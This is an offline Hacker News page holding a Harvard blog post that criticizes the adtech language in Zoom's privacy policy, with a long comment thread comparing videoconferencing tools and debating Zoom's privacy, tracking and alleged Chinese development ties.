Hacker News with comments/articles inlined for offline reading

Authors ranked on leaderboard
Last updated:
Reload to view new stories

March 28, 2020 13:35



Front Page/ShowHN stories over 4 points from last 7 days
If internet connection drops, you can still read the stories
If there were any historical discussions on the story, links to all the previous stories on Hacker News will appear just above the comments.

(1483) Zoom needs to clean up its privacy act

1483 points about 23 hours ago by seapunk in 798th position

blogs.harvard.edu | Estimated reading time – 7 minutes | comments | anchor

As quarantined millions gather virtually on conferencing platforms, the best of those, Zoom, is doing very well. Hats off.

But Zoom is also—correctly—taking a lot of heat for its privacy policy, which is creepily chummy with the tracking-based advertising biz (also called adtech). Two days ago, Consumer Reports, the greatest moral conscience in the history of business, published Zoom Calls Aren't as Private as You May Think. Here's What You Should Know: Videos and notes can be used by companies and hosts. Here are some tips to protect yourself. And there was already lots of bad PR. A few samples:

There's too much to cover here, so I'll narrow my inquiry down to the "Does Zoom sell Personal Data?" section of the privacy policy, which was last updated on March 18. The section runs two paragraphs, and I'll comment on the second one, starting here:

... Zoom does use certain standard advertising tools which require Personal Data...

What they mean by that is adtech. What they're also saying here is that Zoom is in the advertising business, and in the worst end of it: the one that lives off harvested personal data. What makes this extra creepy is that Zoom is in a position to gather plenty of personal data, some of it very intimate (for example with a shrink talking to a patient) without anyone in the conversation knowing about it. (Unless, of course, they see an ad somewhere that looks like it was informed by a private conversation on Zoom.)

A person whose personal data is being shed on Zoom doesn't know that's happening because Zoom doesn't tell them. There's no red light, like the one you see when a session is being recorded. If you were in a browser instead of an app, an extension such as Privacy Badger could tell you there are trackers sniffing your ass. And, if your browser is one that cares about privacy, such as Brave, Firefox or Safari, there's a good chance it would be blocking trackers as well. But in the Zoom app, you can't tell if or how your personal data is being harvested.

(think, for example, Google Ads and Google Analytics).

There's no need to think about those, because both are widely known for compromising personal privacy. (See here. And here. Also Brett Frischmann and Evan Selinger's Re-Engineering Humanity and Shoshana Zuboff's In the Age of Surveillance Capitalism.)

We use these tools to help us improve your advertising experience (such as serving advertisements on our behalf across the Internet, serving personalized ads on our website, and providing analytics services).

Nobody goes to Zoom for an "advertising experience," personalized or not. And nobody wants ads aimed at their eyeballs elsewhere on the Net by third parties using personal information leaked out through Zoom.

Sharing Personal Data with the third-party provider while using these tools may fall within the extremely broad definition of the "sale" of Personal Data under certain state laws because those companies might use Personal Data for their own business purposes, as well as Zoom's purposes.

By "certain state laws" I assume they mean California's new CCPA, but they also mean the GDPR. (Elsewhere in the privacy policy is a "Following the instructions of our users" section, addressing the CCPA, that's as wordy and aversive as instructions for a zero-gravity toilet. Also, have you ever seen, anywhere near the user interface for the Zoom app, a place for you to instruct the company regarding your privacy? Didn't think so.)

For example, Google may use this data to improve its advertising services for all companies who use their services.

May? Please. The right word is will. Why wouldn't they?

(It is important to note advertising programs have historically operated in this manner. It is only with the recent developments in data privacy laws that such activities fall within the definition of a "sale").

While advertising has been around since forever, tracking people's eyeballs on the Net so they can be advertised at all over the place has only been in fashion since around 2007, which was when Do Not Track was first floated as a way to fight it. Adtech (tracking-based advertising) began to hockey-stick in 2010 (when The Wall Street Journal launched its excellent and still-missed What They Know series, which I celebrated at the time). As for history, ad blocking became the biggest boycott, ever by 2015. And, thanks to adtech, the GDPR went into force in 2018 and the CCPA 2020,. We never would have had either without "advertising programs" that "historically operated in this manner."

By the way, "this manner" is only called advertising. In fact it's actually a form of direct marketing, which began as junk mail. I explain the difference in Separating Advertising's Wheat and Chaff.

If you opt out of "sale" of your info, your Personal Data that may have been used for these activities will no longer be shared with third parties.

Opt out? Where? How? I just spent a long time logged in to Zoom https://us04web.zoom.us/), and can't find anything about opting out of "'sale' of your personal info."

Here's the thing: Zoom doesn't need to be in the advertising business, least of all in the part of it that lives like a vampire off the blood of human data. If Zoom needs more money, it should charge more for its services, or give less away for free. Zoom has an extremely valuable service, which it performs very well—better than anybody else, apparently. It also has a platform with lots of apps with just as absolute an interest in privacy. They should be concerned as well. (Unless, of course, they also want to be in the privacy-violating end of the advertising business.)

Finally, Zoom really has no serious value if it doesn't protect personal privacy. That's why they need to fix this.

What its current privacy policy says is worse than "You don't have any privacy here." It says, "We expose your virtual necks to data vampires who can do what they will with it."

Please fix it, Zoom.

As for Zoom's competitors, there's a great weakness to exploit here.




All Comments: [-] | anchor

conradev(4204) about 18 hours ago [-]

As other people have stated in this thread everything in Zoom's privacy policy seems to indicate they are sending data to advertisers only as necessary to advertise their own products. They likely:

- Use the Facebook iOS SDK to measure conversions from app install ads

- Send a list of hashed email addresses to Facebook or other advertisers to do ad re-targeting

- Have Google Analytics on their websites to track where people are visiting their website from, i.e. a click on a Google AdWords ad

While these are all not _ideal_ because _yes_, Google and Facebook use this data for their own purposes as well, it's far from _nefarious_. In fact, it's pretty standard fare. Could Zoom go above and beyond and reject these tools? Yes, they could. Does anyone in practice? No.

If Zoom was selling metadata about their calls, leaking contents of their calls, or themselves served ads – then yes, I'd be concerned. But all indications point to them purchasing ads to further the growth of their business.

I think it is perfectly reasonable to seek guarantees around the usage of the above, more sensitive data (contents of video calls, metadata of video calls, etc.) but on the flip side to imply from their privacy policy that they are sending it to Facebook or that they are 'in the advertising business' is jumping the gun a little bit.

chance_state(4342) about 11 hours ago [-]

Gotta love when HN users go out of their way to apologize for disgusting and immortal behavior by tech companies. I'd expect nothing less.

phyzome(10000) about 13 hours ago [-]

If their Privacy Policy doesn't say they won't sell or distribute call metadata or contents, I have to assume they will. If they want to update their Privacy Policy to make that clearer, I would encourage that.

(And hashed email addresses? Might as well just send the email addresses. Hashing is kind of useless there.)

zndr(10000) about 16 hours ago [-]

The other thing that's important is the privacy policy includes their marketing site You can see a clear list of tools that zoom uses on their Content Management System (CMS) aka Zoom.us here: https://builtwith.com/zoom.us

uoaei(3677) about 17 hours ago [-]

> standard fare

Aka 'common sense' aka 'anything that will fit within the Overton window'

Not to be confused with 'decent, moral behavior'

fapi1974(3488) about 15 hours ago [-]

This is the most levelheaded comment I've see in this thread. Not least because I have literally never seen an ad run on either the Zoom website or the app. Moreover, Zoom is one of the most successful SaaS companies in the world because their unit economics on their basic business model (of selling premium subsriptions) is literally better than almost any other SaaS company out there: https://tomtunguz.com/benchmarking-zoom-s-s-1-how-7-key-metr...

shaan1(10000) about 18 hours ago [-]

Think twice before using Zoom. They have a lot of engineers in China developing the core technology. You would be foolish to conduct meetings and share sensitive docs over zoom. Communist party is listening to everything.

https://www.cnbc.com/2019/03/26/zoom-key-profit-driver-ahead...

madwhitehatter(10000) about 18 hours ago [-]

Zoom was developed in China

Look at the top of page 21 of their sec submission. https://www.sec.gov/Archives/edgar/data/1585521/000119312519...

GekkePrutser(10000) about 22 hours ago [-]

Yeah I hate ZOOM sooo much.

First there was the issue with them turning on the camera by default. At least you could turn that off. Then there was the spyware they installed on every Mac without even asking for consent. And now this...

Since the spyware thing I refuse to install their crap on my machine, but one of our suppliers still uses it and the web client is very choppy.. But they'll just have to put up with it. I'm never installing it again.

geoffeg(10000) about 22 hours ago [-]

I also find their UI to be frustrating, especially the chat part of it. I have yet to find a way to make the chat more dense, every message seems to have an excess of white space. Also, at least with the company that I use it with, there's no obvious way to search message history.

chmaynard(178) about 15 hours ago [-]

> First there was the issue with them turning on the camera by default.

FaceTime does this as well, even when I'm making a phone call via Contacts. I hate it.

geoffeg(10000) about 23 hours ago [-]

> As quarantined millions gather virtually on conferencing platforms, the best of those, Zoom, is doing very well.

Why would Zoom care about their privacy issues if they're doing so well off? Seems like that's a good amount of positive reinforcement that their current approach is the right one to them. Maybe they'll lose a few thousand customers because of it, but given what I'm sure was a huge increase in the past few weeks, why would it be something they're concerned about?

chaps(10000) about 23 hours ago [-]

Because it's the right thing to do.

bradly(1482) about 22 hours ago [-]

The reason Zoom is doing so well is part of its vulnerability. There is very little vendor lock-in with virtual conferencing platforms. If something new/better comes out next month, there isn't much a company will give up by switching vendors. There is little to no infrastructure to setup/maintain. This is the same reason Slack's popularity has skyrocketed. Because of the lack of history and transient nature of the content shared in them, these areas are quick to gain popularity, but also quick to be replaced when a better product emerges.

bryanrasmussen(265) about 23 hours ago [-]

Because the EU is on lockdown, lots of EU citizens now using Zoom, and all of those users are potential liabilities due to GDPR issues.

api(1134) about 23 hours ago [-]

The unfortunate wisdom in business is 'nobody cares about privacy or security,' and in my experience it's true. Outside a small number of people nobody even asks these questions.

With our own product ZeroTier we get maybe 1-2 questions a year about privacy and so far only a few enterprise customers have even asked about the security of encryption and authentication. 'It's encrypted' is good enough for 99.9% of the market. Encrypted with what? A cereal box cipher? Nobody cares.

What do people care about? In my experience its ease of use, ease of use, ease of use, ease of use, and ease of use, in no particular order. An app that's a privacy and security dumpster fire but is very easy to set up and use will win hands down over a better engineered one that requires even one or two more steps to set up.

randomsearch(4327) about 22 hours ago [-]

OTOH if you're making money from your product why trash it yourselves

luminati(4341) about 15 hours ago [-]

Honest question [not trying to act controversial], especially with all the US-China spat.

Zoom's engineering team is based in China - the product is primarily built out of there. [1]

What guarantee is there that the CCP is not intercepting/backdooring all video communications? Especially in current situations, where so much sensitive information is being discussed via Zoom?

[1] https://www.cnbc.com/2019/03/26/zoom-key-profit-driver-ahead...

systemvoltage(10000) about 14 hours ago [-]

I've said this time and again only to get downvotes since there is no proof or substantiation about the CCP surveillance claims. But, it is an important to keep in mind. There are things that I cannot say due to our employment contract and NDA, but to say the least, we are looking into this matter.

Surveillance prospects, doesn't matter where they originate - US or China or Country X - need to be discussed and examined. But apparently, saying anything against China on HN is an automatic ban for creating a flame war. We've become too soft. Obviously personal attacks and racism is not tolerable. But, I would personally (some may disagree) say that we should also criticize bad parts of culture too...that's for another day or a different forum.

Can we just get past the my country your country bullshit on HN and talk about privacy implications especially from the world's largest surveillance network? It is one thing to be spied upon for advertisement tracking, an entirely another to be spied upon by a brutal authoritarian government. Fearlessly criticizing CCP or the NSA, or Israeli intelligence agency or whatever... should be one of the most important things to talk about on 'Hacker' news forum.

I am gonna fire off some anon emails to WSJ/NYTimes/WaPo/Guardian to create some awareness and perhaps they can dig further into Chinese influence in using Zoom. I am deeply concerned. The entire world has given up video/audio/screen/application privacy in a snap... for the data might be stored in Tianjin datacenter, needless to say whose keys are in the hands of CCP - I guarantee that but cannot provide proof.

Edit: past comments that were downvoted (and flagged): https://news.ycombinator.com/item?id=22657794

https://news.ycombinator.com/item?id=22684767

https://news.ycombinator.com/item?id=22663295

https://news.ycombinator.com/item?id=22705960

kortilla(10000) about 14 hours ago [-]

Not much. In particular, the fact that you sign up for accounts under company emails makes it much easier for them to selectively target based on which users look the juiciest. Even if the backdoor isn't in the public code, it's trivial to put in logic to have clients receive a different update when signed in with an account marked as "VIP" or whatever.

kccqzy(3192) about 13 hours ago [-]

I really hate to mention this, but this perhaps answered an question of mine about why quality of code in Zoom is so low.

When I installed Zoom for Mac for the first time, I noticed it took a while to start up and caused beachballing. So I grabbed a sample of the process via Activity Monitor. To my utter horror, the Zoom binary is shelling out by calling system(3) on the fucking main thread.

I just verified this is the case on the latest version of Zoom for Mac. The binary zoom.us.app/Contents/Frameworks/zmLoader.bundle/Contents/MacOS/zmLoader invokes system(3) on three separate occasions in two functions: -[ZPMBSystemHelper disablePTAutoRestoreWindow] and -[ZPMBSystemHelper disableConfAutoRestoreWindow].

And looking at what the string was, it's just a fucking call to defaults(1). Now I'm not a Mac programming expert but I cannot understand why Zoom needs to change its own preference settings this way. This just screams sloppy software engineering quality. I guess this is what you get when you outsource software engineering.

I would not be surprised at all if someone reports vulnerabilities in Zoom, whether deliberate or accidental.

tly_alex(10000) about 14 hours ago [-]

Zoom as a legal entity is a US company, headquartered in San Jose, California. So US law should apply.

https://en.wikipedia.org/wiki/Zoom_Video_Communications

eternalny1(3232) about 12 hours ago [-]

Of course the CCP can intercept those videos, Snowden's book talked about how the NSA is doing what they are doing specifically because China was doing it.

It's not specific to Zoom, they intercept at the global fiber lines, they can watch ANY video they want.

So yes, the CCP can watch your videos and so can the NSA.

CoffeeDregs(4217) about 21 hours ago [-]

Title is sort of incorrect: 'Zoom needs to clean up its privacy act' should be 'Zoom needs not to do stupid shit'...

I'm a fan of the product but this is ridiculous behavior (great Linux support). I have a hard time imagining the product meeting in which 'Yes. That's a good idea. Let's do it.' was said. I get that FB is big, that Zoom wants the credibility, etc but that's a sign that management is not thinking clearly about their product and should be a red flag to any investor (among the many green flags from current demand)...

thoraway1010(10000) about 19 hours ago [-]

You realize investors are laughing their way to the bank because of the ease of use focus of zoom? The investors in the fully encrypted privacy based video conferencing platforms (yes, they exist) are broke now.

meritt(10000) about 22 hours ago [-]

It works really well.

One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in. It's drastically reduced people fumbling around with phone numbers + participant codes, ending up in the wrong meeting, or getting stuck in some unnecessary software install loop. If someone is more than two minutes late, they're getting a phone call that brings them instantly into the meeting.

Also a really nice feature, again for phone conferences, is when people dial-in I see their phone number handle in the UI. But during the call as they introduce themselves or I look up their number, I can then rename their user to something recognizable. Now if I'm on a call with 5 people at another firm, I appear really impressive because I know who each person is by their name. When someone is speaking on the conference call, their icon lights up. If someone has a ton of background noise I can easily mute them.

Zoom Phone (addl paid feature) is awesome too. Virtual phone numbers, IVR, call routing, busy hours, I can instantly turn a 1:1 conversation into a zoom meeting that other people can join, etc. Zoom Phone works on my iphone like a regular dialer, and I can place/receive fully digital calls on it (pretty similar to how Google Voice works), so it doesn't matter if I have actual cell service.

I've never used Microsoft Teams, and does look really snazzy, but Zoom is an absolute joy to use compared to every single other conferencing software I have ever used. The video chat and screensharing is fast and responsive and just works exactly like you would expect it to.

andrepd(3744) about 20 hours ago [-]

>One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in.

Jitsi Meet has this feature

jbuscher(10000) about 22 hours ago [-]

Honestly UberConference works way better...

jmacd(2392) about 22 hours ago [-]

I believe Zoom Phone is a whitelabel of RingCentral

hpcjoe(10000) about 22 hours ago [-]

Having used zoom, teams, skype for business, webex, and many others ... zoom is the only one of these which just works. I'm on the con calls typically 5+ hours a day. Yes, it is soul crushing.

Teams sorta works, though it often messes up with devices. Headsets and speakers (I've got a Jabra speak 710). Often times it handles contention badly.

Skype ... yeah. The less said the better.

Webex. Must be marketing for Zoom and others, given how unreservedly horrible the UX is.

I've also used uberconference some years ago. Almost as good as zoom.

I am looking at containerized ways to run zoom to restrict its access to my system, but it is the best IMO, by far.

[edit] I should note that I've also used Viber a bit. Less now though. Mostly for calling home from overseas. Not great for conferencing though.

ThePowerOfFuet(10000) about 21 hours ago [-]

>One that has been a total game changer for my company is when I'm hosting a conference call, I can simply 'Invite by Phone' my participants. They get a phone call, are prompted to 'Press 1 to enter the conference', and boom they're in. It's drastically reduced people fumbling around with phone numbers + participant codes, ending up in the wrong meeting, or getting stuck in some unnecessary software install loop. If someone is more than two minutes late, they're getting a phone call that brings them instantly into the meeting.

Why on earth are people needing to make POTS phone calls to join a meeting? Not only is the audio of vastly inferior quality, the information isn't being kept secure AND they can't see anything being presented.

Instead, why not shoot them a link so they can just click it and be in the meeting? That's how it SHOULD work, but that's not how it DOES work with Zoom (unless you engage in tomfoolery to make like you're trying but failing to install the software, and only then do you get a link to join via browser — but then then you get a deliberately-crippled experience because fuck you).

Scoundreller(4304) about 22 hours ago [-]

Yep. It just works. First time use is nearly instant.

WebEx always took a while to on-board.

panpanna(10000) about 22 hours ago [-]

> It works really well.

Does it?

Asking because I just left a zoom meeting with horrible sound quality and extremely bad video quality. Why would anyone prefer that to Teams is beyond me.

Edit: interesting this is _heavily_ downvoted. Can't a person have a bad experience and tell HN about it?

Scoundreller(4304) about 22 hours ago [-]

Zoom Phone has been a game changer.

1 of the 2 big cell phone networks we have: Rogers, is regularly failing to connect calls during peak hours for the past week. Being able to do digital calls has changed a lot, and probably took a load off their network.

(I say 2 big networks because Bell and Telus share tower infrastructure, Dunno where it separates out again, possibly just billing.)

angrygoat(2940) about 21 hours ago [-]

Another pretty great thing with Zoom is that it'll keep a call up even if, say, your home internet drops out and you switch to tethering on your phone. It sounds rare, but with Australian internet or dodgy campus wifi, this is a really useful feature.

Yizahi(10000) about 21 hours ago [-]

Yes we transitioned from Webex + Lync + Skype + Cisco phones to just Zoom and it is amazing (aside from privacy breaches of course). Conferencing is a pain and Zoom solves a lot of existing issue in that area so companies recognize this, especially when people in change also use conference software :) .

dang(182) about 19 hours ago [-]

(This subthread was originally in reply to https://news.ycombinator.com/item?id=22703219)

hanoz(2201) about 18 hours ago [-]

As it's beginning to look like my days as a Zoom refusenik are numbered, what is the safest way to use it? Android, iOS, Chomebook, some form of virtualization or container?

jjgreen(3954) about 18 hours ago [-]

On a disposable laptop on an isolated subnet. Then burn it after use.

bchociej(10000) about 18 hours ago [-]

I run it, along with other sketchy garbage proprietary software for wook, in a QEMU VM. Or I just dial in and let people suffer through me being on a phone connection owing to their choice of software.

Tokkemon(10000) about 23 hours ago [-]

Is Zoom the best though? Google Hangouts seems to be just as good.

ltrcola(4330) about 16 hours ago [-]

I like Hangouts overall, but the killer feature that's missing is a good gallery view where I can see more than 4-6 participants at a time. Zoom is really good at this.

primity(10000) about 23 hours ago [-]

I use both at work, and Hangouts has less features and struggles more noticeably with bad connections. I consider Hangouts worse

jacobobryant(4149) about 23 hours ago [-]

For me, zoom consistently has far better A/V quality than hangouts.

So we have two anecdotes now I guess.

thekyle(3181) about 23 hours ago [-]

I tried Google Hangouts on Firefox on Linux but couldn't get it to work at all. It just errored out before starting the call.

RMPR(10000) about 23 hours ago [-]

'Seems'. Some people reported that Zoom handle gracefully more participants than Hangouts and performs better on a slow connection, see this thread: https://news.ycombinator.com/item?id=15717701 and this one: https://news.ycombinator.com/item?id=16155155

There are probably a couple of others you can find here and there.

Edit: Well, this thread also.

RyanShook(3000) about 23 hours ago [-]

Everyone mentions Jitsi on HN but I'm guessing AV quality isn't as good as Zooms...

buro9(1991) about 23 hours ago [-]

Try it at 12 people.

Try it when you want to control who is speaking and when.

Try it when you want to co-ordinate hundreds of participants and still want to track who has a question so you can hand the virtual mic / airtime to them.

Try it when you want breakout groups and to determine who is in which group, and after a set time for the groups to return to the main space.

What is good enough for 2 people facing each other, and appears to work perfectly well for a group of 5 or 6... doesn't quite scale to a company all-hands, or giving a lecture or seminar.

Tools fit a scale, and Zoom is excessive for the small and simple use-case but excels at the large and complex.

quaffapint(4206) about 22 hours ago [-]

We just used it at work with 500+ people. After all the various teleconferencing crap we paid $$$ for, we couldn't use them because they couldn't handle it. Zoom worked flawlessly.

holler(10000) about 20 hours ago [-]

My experience with google hangouts over the years has been that it's a poorly made product. It does work 'ok' for 1-1 but the video quality would frequently drop or not connect at all. Zoom just 'works'.

shd4(10000) about 17 hours ago [-]

Zoom needs to fuck off. This is apologism. We need open source and decentralized solution and we need to shut up. I'm tired of this.

tomstockmail(10000) about 17 hours ago [-]

I've been using Jitsi Meet

https://jitsi.org/jitsi-meet/

shd4(10000) about 16 hours ago [-]

Oh yea, I know that there are technical difficulties considering the decentralization. But why aren't we working on it now? Dunno what we're waiting for. Mass adoption?

mikestew(4070) about 23 hours ago [-]

I have a need for Zoom, virus or no, but the point of the article is why I don't give them money. Give them money, while the company is apparently still going to worry about milking advertising dollars out of me? That's just going to be a strong 'no'. As the final paragraph of TFA says, either charge more or give away less for free. But if you're selling me out to advertisers after I've given you money, then you're one of 'those' companies that I avoid if at all possible. Because they're skeezy. You don't want to appear skeezy, do you, Zoom?

So for now Skype and MS Teams works fine, or at least fine enough that I don't bother with Zoom. Which brings me to a side question: what is the value proposition for Zoom? What does their product do so much better than the others that I'd put up with this shit? Why am I hearing the hell out of it lately? Outstanding PR department?

EDIT: thanks for your answers to "why use it, then?" Because "it just works" seems to be the summary, which hoo boy, one cannot say about a lot of the competition.

loudmax(10000) about 21 hours ago [-]

If your concern is privacy, why are you using Skype and MS Teams?

If you don't want a third party getting your contact information, then use a private solution that's actually private. Jitsi and Matrix are open source solutions that both support video conferencing.

pergadad(10000) about 20 hours ago [-]

Alternatives might be Jitsi and the 8x8 supported by Jitsi tech.

chanmad29(10000) about 22 hours ago [-]

Does anyone know what could Facebook do with such video calling data?

PS- I hate misuse of my data as much as the next person.

chaz(2593) about 21 hours ago [-]

> Give them money, while the company is apparently still going to worry about milking advertising dollars out of me?

Does Zoom have ads? I haven't seen any. I believe all of the ad tracking is for the reverse: Zoom wants to see if their own advertising is effective. For example, if they buy an ad on Facebook that you saw and then you install the app, they can attribute the install to that ad and measure ROI.

impendia(4023) about 22 hours ago [-]

> What does their product do so much better than the others that I'd put up with this shit?

I'll share my perspective as an academic. Many of us have adopted Zoom, practically overnight, for our teaching, for one-on-one meetings with students, and even for conferences [1].

The answer is: It just works. It's easy. It does what we want it to, with a minimum of fuss.

As someone who now has a whole bunch of unanticipated shit to deal with, this is one less thing to worry about.

I definitely share your objection in principle. If this situation continues long into the future (a terrifying thought), then perhaps I'll revisit my choice of software. But in the short term, to be honest, I don't much care.

[1] https://www.daniellitt.com/agonize/

wenc(4314) about 22 hours ago [-]

I've used Skype (for business and normal Skype), FaceTime etc. The Zoom experience is just much better for larger groups (> 10).

I use Teams at work and would say it is comparable to Zoom in terms of AV quality (Microsoft owns both Skype and Teams portfolios, but Teams is built on a modern codebase that runs on different, markedly superior infra than Skype). Unfortunately Teams only works in the enterprise (O365), and it is still fairly new so it doesn't have a lot of the collab functionality like whiteboarding and breakout rooms that Zoom has.

Privacy issues aside, Zoom really is a better product. People are more forgiving of a product's peccadillos when it just works.

tmpz22(4343) about 17 hours ago [-]

I said this at the beginning of the crisis and first major rush to Zoom by many companies: their start-up friendly business model is going to bite them hard when they have to blitzscale services and there will be growing pains while they find the right non-vc-subsidized pricing model for long-term customers.

I think we can cut them some slack for now as they are under more pressure then many other tech companies. They managed to make a great product - so presumably they'll be able to build the right processes for the company itself soon too.

gowld(10000) about 19 hours ago [-]

I don't get it. I get that you don't like the adalytics-based business model, you don't use the product. But I don't see a rational basis for making that conditional on cash price, which is an independent concern. It only makes sense if you value the product at somewhere between the cash price and (the cash price - the adalytics cost), and $0 cost is exceedingly unlikely to be the exact boundary.

It only makes sense if you make the unsupported leap in logic that says that the cash price is itself promise to not use analytics. But you are willing to accept $0 adalytics-supported products, and FOSS exists and some has adalytics and some doesnt, showing that $0 is not any kind of meaningful boundary.

flattone(10000) about 22 hours ago [-]

Nothing works good enough to be worth forfeiture of our self respect

matheusmoreira(10000) about 11 hours ago [-]

> the company is apparently still going to worry about milking advertising dollars out of me

They will never not do that. Paying customer or not, no business is ever going to say 'let's give up a huge amount of revenue so we can avoid invading people's privacy and annoying them with ads they don't want to see'. To do so would be to miss an opportunity to make even more money.

The fact you're a paying customer also implies you have disposable income and you're willing to spend it. Ironically, paying money to avoid advertising makes your attention even more valuable to advertisers.

The only way they'll stop advertising is if it's not profitable. The only solution is to block all ads and reduce their return on investment as much as possible.

michaelbrooks(4280) about 22 hours ago [-]

Have you taken a look at [0]WhereBy? It's been recommended as a great alternative to Zoom.

[0]https://whereby.com/

imagiko(3967) about 17 hours ago [-]

I just Ctrl+F'd Google Meet and no one seems to be really talking about it. We've been using it for our meetings for a long time and it works really well. I'm wondering why it doesn't have widespread adoption. You can call-in via phone, can log the minutes of the meeting and seems to 'just work' too

gregkerzhner(3914) about 15 hours ago [-]

I am also confused about why zoom is the de-facto conference tool now. I have been working remotely for 6 years and haven't really noticed it being significantly better than other tools like Lifesize or Bluejeans. Also, the inability to draw on the presenter's screen is a big negative in my opinion. Trying to pair lately over Zoom always ends in a bunch of stammering like 'erase that dot over there.. no... over there... no, up left...'

TheKarateKid(10000) about 9 hours ago [-]

> But if you're selling me out to advertisers after I've given you money, then you're one of 'those' companies that I avoid if at all possible.

Sadly, this happens everywhere. Verizon and ATT? Selling your location and data usage patterns for years.

Bank accounts and credit cards? Selling your purchase patterns for decades.

floatingatoll(4062) about 22 hours ago [-]

Compared to the other ten or twenty videoconferencing solutions, it's the only one that has worked reliably and without accessibility issues for technical and non-technical people in my life. The automatic video and audio processing features make it so that a day-one user has as good an experience as a year-two user, and I haven't had to answer any technical support questions about it to my family.

FaceTime is the only serious competitor I can think of that's able to deliver as quality of a call experience in a 1:1 setting with non-technical participants, but it's inaccessible on Windows/Android for starters, and lacks the presentation chops to be used in a business setting.

binarymax(2322) about 23 hours ago [-]

To answer your last question - it works very well. I've used lots of virtual meeting software over the past 20 years, and zoom is by far the best.

I agree with your sentiment though - it makes me angry that they're selling my personal data. But sadly I don't think that any companies will voluntarily be non-skeezy...we really need laws and regulations in this space. I don't trust capitalism to take care of my privacy. If companies can get more money without breaking the law, they will absolutely do so.

epanchin(10000) about 22 hours ago [-]

Not much different to Microsoft. Buy Windows, still get tracking and ads. I use it because it's convenient.

Hard to justify moving from zoom to ms teams when Microsoft have shown they don't care about privacy either.

bt3(10000) about 23 hours ago [-]

My take: Zoom is very approachable outside of enterprise. Skype (although historically has its roots with regular folks), is mostly used in a 'Skype for Business' config. MS Teams is much the same way.

Good PR helps too, I suppose.

gray_-_wolf(10000) about 20 hours ago [-]

> Because "it just works" seems to be the summary

I am using it in chromium on linux, and I can tell you it does not just work. The audio is really really shit (constant crackling). I'm basically unable to attend meetings on zoom. Luckily most of them are in google meet which works fine in a browser.

bchociej(10000) about 18 hours ago [-]

I'm with you. I have no idea what people like about it that isn't already done better in e.g. Google Meet. Having to download a program is also really crappy IMO. Plenty of other video chat applications work in my browser.

u801e(10000) about 19 hours ago [-]

> So for now Skype and MS Teams works fine, or at least fine enough that I don't bother with Zoom. Which brings me to a side question: what is the value proposition for Zoom? What does their product do so much better than the others that I'd put up with this shit?

For me, it's one of the few video chat clients that works well in Linux. Skype may or may not work depending on the version and whether or not Microsoft supports the Linux client. And I have no idea whether MS teams works at all in Linux.

collyw(4322) about 21 hours ago [-]

Having used a few of these lately, it seems to have the best quality of call.

Skype is terrible some days. Google hangouts is OK. Cisco Webx is dead in the water every time I have tried to use it.

Maybe I just haven't used Zoom enough as the other two do have good days and bad days.

memco(10000) about 22 hours ago [-]

So many replies here have identified the value of Zoom: it is easy to use and has reasonably good quality. So the questions I have: can we add to this? Are there ways to use Zoom more privately?

Personally I haven't seen many people offer up alternatives that are clear winners. They all have tradeoffs. Since there's tradeoffs I have a hard time moving people to some other direction. If I could says, 'Oh Zoom is nice, but Schmooz is the best!' I know people who'd make the move. Even if it's paid.

Gene_Parmesan(10000) about 22 hours ago [-]

I think you hearing a lot about it because (a) everyone is quarantined and wanting to use the tools they use at work to help setup book club meetings, table-top RPG sessions (did this last night and it actually worked great), etc. (b) it's perhaps easier to use than some others, (c) there's likely a huge PR push right now, and (d) I believe its pricing is better for non-enterprise use than others.

My company's virtual meeting solutions are a mess; it's the one really messy area in our tooling. For the longest time we had GoTo, but then the dev team specifically also had hipchat for Slack-like interactions. Then hipchat went away, and for some reason the org took that as a cue to do an org-wide rollout of MS Teams, with no approval for us to use Slack. Somewhere along the way certain people somehow acquired Zoom licenses and started using those. Then just about two weeks ago the whole org was told to switch to Zoom, but now not enough people have licenses and all the old GoTo licenses are kaput.

Anyways, the reason I have heard various people from the business side give for why they like Zoom is 'GoTo was too hard to use.' I don't really see that, and I also wonder if there's some sort of 'FOMO' going on. A couple big vendors we interact with use Zoom, Zoom is big in the news currently -- 'everybody uses Zoom!' I do also think it's maybe a bit cheaper at enterprise scale.

I don't mind Zoom from a UX/call quality perspective. I think Alt-A to unmute is super unintuitive but that's a very minor quibble, and for all I know shortcuts are customizable. I am, however, very discouraged by Zoom's privacy story as we're discussing here.

---

As my own side note, I am generally on board with almost everything MS has been doing lately -- we're mostly a MS shop as they help us with pricing, given we're a nonprofit, while AWS told us 'no chance' -- but Teams has to be the single buggiest MS product I've ever used. Just now, over the past month or so, I've noticed it very slowly improving. But for the first year of our usage, we experienced constant issues. Dropped calls, silent crashes, daily sync failures. My favorite one was, every time I would shut down Teams, it would relaunch itself a few seconds later with a message saying 'sorry, Teams has crashed, we're recovering.' Apparently every time the program received a shutdown msg it just assumed 'oops, another crash.'

SnowflakeOnIce(10000) about 20 hours ago [-]

Many music teachers are doing online lessons now, mostly via Zoom.

It seems that Zoom is the only popular videoconferencing software these days that allows you to disable all the postprocessing on the audio signal (echo cancellation, noise reduction, etc) through advanced settings. This postprocessing is very useful for /conversation/ meetings among many people with bad audio setups, but for two musicians and music signals, the postprocessing is highly detrimental, causing strange audio artifacts and causing instruments to drop out sporadically.

(It seems like there would be a market for videoconferencing software optimized for musicians, where the audio signal is sent at higher quality, given higher priority, and not postprocessed in detrimental ways. And without all the privacy concerns.)

imhoguy(4113) about 16 hours ago [-]

It also just works on Linux - video, screen sharing, window sharing, remote control, whiteboard. Moreover: recording, simple way to mute anyone as host, host less rooms. 1-100 peers? no problem. No need to create account for guests to participatie.

sytse(1843) about 11 hours ago [-]

Zoom decided to remove the Facebook SDK in their iOS client https://blog.zoom.us/wordpress/2020/03/27/zoom-use-of-facebo... fixing this issue.

ChrisMarshallNY(4343) about 22 hours ago [-]

Zoom is the first video conferencing platform that I've used, that works reliably. They are gonna come out of this mess smelling like roses, no matter what carbuncles are exposed.

I've been doing videoconferencing for over 30 years (Yes, they had it back then -we used PictureTel systems, over ISDN).

I regularly participate in Zoom meetings with 20 or more attendees. I know of ones that have over 400.

An amazing thing to me, is that technophobes can pick up on it very easily. Very little of that pre-meeting 'Mute your mike!', 'Can you hear me?', 'Whose dog is that?', tons of texts, asking for help, etc, stuff.

Skype is very bad for more than a small handful of attendees.

WebEx and GoToMeeting are OK, I guess, and I've heard good things about BlueJeans.

But Zoom is what I use, and Zoom is very popular with people that suddenly need to gather, and can't do so, physically.

